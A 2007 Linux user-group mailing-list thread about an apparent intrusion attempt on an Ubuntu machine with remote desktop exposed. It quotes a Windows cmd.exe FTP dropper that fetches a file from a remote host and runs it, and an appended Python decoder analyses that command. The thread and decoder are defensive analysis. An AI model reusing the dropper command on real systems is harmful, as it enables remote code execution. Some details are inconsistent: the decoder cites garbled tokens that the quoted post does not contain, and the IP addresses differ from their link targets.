[Dclug] Whats happening here? Is this a hacking attempt?
macoafi at gmail.com
Sat Mar 31 01:33:34 EDT 2007
I've heard as low as 8 minutes for a Windows computer to be compromised.
On 3/30/07, Mike Vore <mike at vorefamily.net> wrote:
> Arun Mallikarjunan wrote:
> > Hi again,
> > I had mentioned before that my mom (she lives in Chennai, India) has been
> > using Ubuntu Edgy for about 8 months now without any issues. Last week
> > she wanted me to show her how to rip music off of CDs! I asked her
> > to enable remote desktop and showed her how to use the extractor. Well,
> > the next time she came online she told me that somebody was trying to take
> > control of her computer. I told her that that's not possible. Then she
> > sent me this piece of code:
> > run %systemroot%\system32\cmd.exe
> > cmd /c echo open oki 21 >> ik &echo user u2m6g k3bmt >> ik &echo binary
> > >> ik &echo get asd >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik
> > &asd &exit
> > I was a little surprised at seeing these messages. They are certainly
> > related to Windows, which she doesn't use and I don't either.
> > The next day when she came online she said that 126.96.36.199
> > <http://188.8.131.52> was trying to take control and 5 minutes later
> > she said 184.108.40.206 <http://220.127.116.11> was. I looked these IPs up at
> > http://www.ip-adress.com/ and they seem to be coming from Germany and
> > Taiwan. I made her turn off the remote desktop and she hasn't seen it since.
> > Here are my Q's:
> > 1. How did they find her?
> They may not be attacking 'her', just an IP address.
> > 2. She doesn't leave the comp on. How are they finding her? She does have
> > a ddns script which updates dyndns.org <http://dyndns.org>. If that's the
> > case, how did they find out her dyndns name?
> Same answer. I once set up a school on their T1 Class-C (24-bit) network. I
> watched the input to the firewall - within just minutes of going on the net
> there were about a dozen port-scans on each of the addresses in the
> range. Anyone with nmap can start an address or port scan on just about
> any IP.
> > 3. What can I do to check if they have gotten in?
> It would probably take more time to check than to wipe the disk clean and
> > 4. What to do to stop them from getting in? I am going to install a
> > firewall, any particular one in mind? The problem is that I have to
> > install it and then I have to instruct her to open ports, which is why it
> > needs to be simple enough for her to understand.
> Install a Firewall IMMEDIATELY. Unless/Until she needs to act as a server
> there is almost no need for opening any port for inbound traffic. But if she
> does need something like SSH to access from her office, put it on a high port
> and have the firewall not only do NAT but Port Forwarding. For instance I
> have my inbound SSH on port XXXX and have the Firewall/Router translate it to
> my 'big iron' on port 22. Also set up incoming filtering to only allow your IP
> number (if you have a fixed one) or your ISP's subnet; for example if you are
> using Verizon FiOS you may find that you are using numbers in the
> 71.245.xxx.yyy range. Setting the filter to 71.245/16 won't stop everyone, but
> it will keep anyone not on Verizon's net out. Set up all incoming services
> that you need - like remote desktop - to use high numbers and do Port
> Forwarding - not a lot of help but it will keep someone from using default settings.
> When I started using FiOS and allowed port 22 (SSH) through I had many
> attempts, but none after I used the high port number with Port-Forwarding.
> NEVER put any unprotected computer directly on the net. I think the time for
> a virgin Windows system to become compromised is now under 20 minutes.
> That's my take on the situation, YMMV. Others may
> Mike Vore
> Dclug mailing list
> Dclug at calypso.tux.org
Linux User # 432169
Hey, type this in the terminal! It's really fun!
aptitude -v moo
just keep adding v's to that and watch it change
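The command quoted above is the standard Windows FTP-dropper pattern: a series of `echo ... >> file` lines builds an ftp script, `ftp -n -v -s:file` runs it (`-n` disables auto-login so the script's own `user` line supplies the credentials, `-s:` names the script), `del` removes the script, and the downloaded file is then executed. The following is an added example for this thread, not code from the original post or the Dclug list: it decodes such a chain and reports what it would do. The sample input is a constructed, cleaned-up copy of the quoted command (the garbled tokens `fotp`, `diels` and `>>w ikh` are read as `ftp`, `del` and `>> ik`); the host name `oki`, the credentials and the file name `asd` are taken as they appear in the post.

```python
"""Decode a cmd.exe "echo ... >> script & ftp -s:script & del script & payload"
dropper chain and report what it would do.  Added example for this thread, not
code from the original post or the Dclug list.

SAMPLE is a constructed, cleaned-up copy of the command quoted in the thread:
'fotp', 'diels' and '>>w ikh' are read as 'ftp', 'del' and '>> ik'; the FTP
host 'oki', the credentials and the file name 'asd' are as they appear there.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass, field

SAMPLE = (
    "cmd /c echo open oki 21 >> ik &echo user u2m6g k3bmt >> ik &echo binary "
    ">> ik &echo get asd >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &asd &exit"
)

# 'echo <text> >> <file>' or 'echo <text> > <file>'
_ECHO = re.compile(r"^echo\s+(.*?)\s*>>?\s*(\S+)\s*$", re.I)


@dataclass
class Dropper:
    """What the decoded chain would do on the victim host."""
    script_file: str | None = None          # file the echo lines build
    ftp_script: list[str] = field(default_factory=list)
    host: str | None = None                 # FTP server from 'open'
    port: int = 21
    user: str | None = None                 # from 'user <name> <password>'
    password: str | None = None
    fetched: list[str] = field(default_factory=list)   # local names written by get/recv
    executed: list[str] = field(default_factory=list)  # fetched files later run as commands
    deletes_script: bool = False            # 'del <script>' after the transfer


def split_chain(cmdline: str) -> list[str]:
    """Split a cmd.exe line on '&'/'&&' after dropping a leading 'cmd /c'."""
    line = re.sub(r"^\s*cmd(\.exe)?\s+/c\s+", "", cmdline, flags=re.I)
    return [seg.strip() for seg in re.split(r"&&|&", line) if seg.strip()]


def _stem(name: str) -> str:
    """'C:\\dir\\asd.exe' -> 'asd': compare commands with fetched files loosely."""
    return name.lower().rsplit("\\", 1)[-1].split(".", 1)[0]


def _parse_ftp_script(d: Dropper) -> None:
    """Interpret the lines that 'ftp -s:<file>' would read.  With -n the client
    does not auto-login, so the script's own 'user' line carries the credentials."""
    for line in d.ftp_script:
        parts = line.split()
        if not parts:
            continue
        verb = parts[0].lower()
        if verb == "open" and len(parts) >= 2:
            d.host = parts[1]
            if len(parts) >= 3 and parts[2].isdigit():
                d.port = int(parts[2])
        elif verb == "user" and len(parts) >= 2:
            d.user = parts[1]
            d.password = parts[2] if len(parts) >= 3 else None
        elif verb in ("get", "recv") and len(parts) >= 2:
            # 'get remote [local]': the local name is what later gets executed
            d.fetched.append(parts[2] if len(parts) >= 3 else parts[1])


def decode_dropper(cmdline: str) -> Dropper:
    d = Dropper()
    files: dict[str, list[str]] = defaultdict(list)  # simulated redirect targets
    for seg in split_chain(cmdline):
        m = _ECHO.match(seg)
        if m:
            files[m.group(2).lower()].append(m.group(1))
            continue
        tokens = seg.split()
        head = tokens[0].lower()
        if _stem(head) == "ftp":
            for t in tokens[1:]:
                if t.lower().startswith("-s:"):
                    d.script_file = t[3:].lower()
            d.ftp_script = list(files.get(d.script_file or "", []))
            _parse_ftp_script(d)
        elif head in ("del", "erase"):
            d.deletes_script |= any(t.lower() == d.script_file for t in tokens[1:])
        elif head in ("exit", "rem"):
            continue
        elif _stem(head) in {_stem(f) for f in d.fetched}:
            d.executed.append(tokens[0])
    return d


def summarize(d: Dropper) -> str:
    """One-line analyst summary of the decoded chain."""
    creds = f"{d.user}:{d.password}" if d.user else "anonymous"
    return (f"FTP to {d.host}:{d.port} as {creds}, download {d.fetched or 'nothing'}, "
            f"run {d.executed or 'nothing'}, "
            f"{'delete' if d.deletes_script else 'keep'} script {d.script_file!r}")


if __name__ == "__main__":
    print(summarize(decode_dropper(SAMPLE)))
```

Run stand-alone it prints the summary for the sample: the chain connects to the FTP server named in the `open` line with the hard-coded credentials, downloads `asd`, runs it, and deletes the `ik` script so nothing obvious is left on disk. The same decoder works on other chains of this shape (several `echo` targets, `get remote local`, `ftp.exe` with a full path), which is why it simulates the redirect targets instead of pattern-matching the one quoted string. Note that this payload is a Windows `cmd.exe` script: on the Ubuntu machine in the thread it would not have run, but its appearance means an automated scanner reached the exposed remote-desktop service and tried a canned Windows exploit against it.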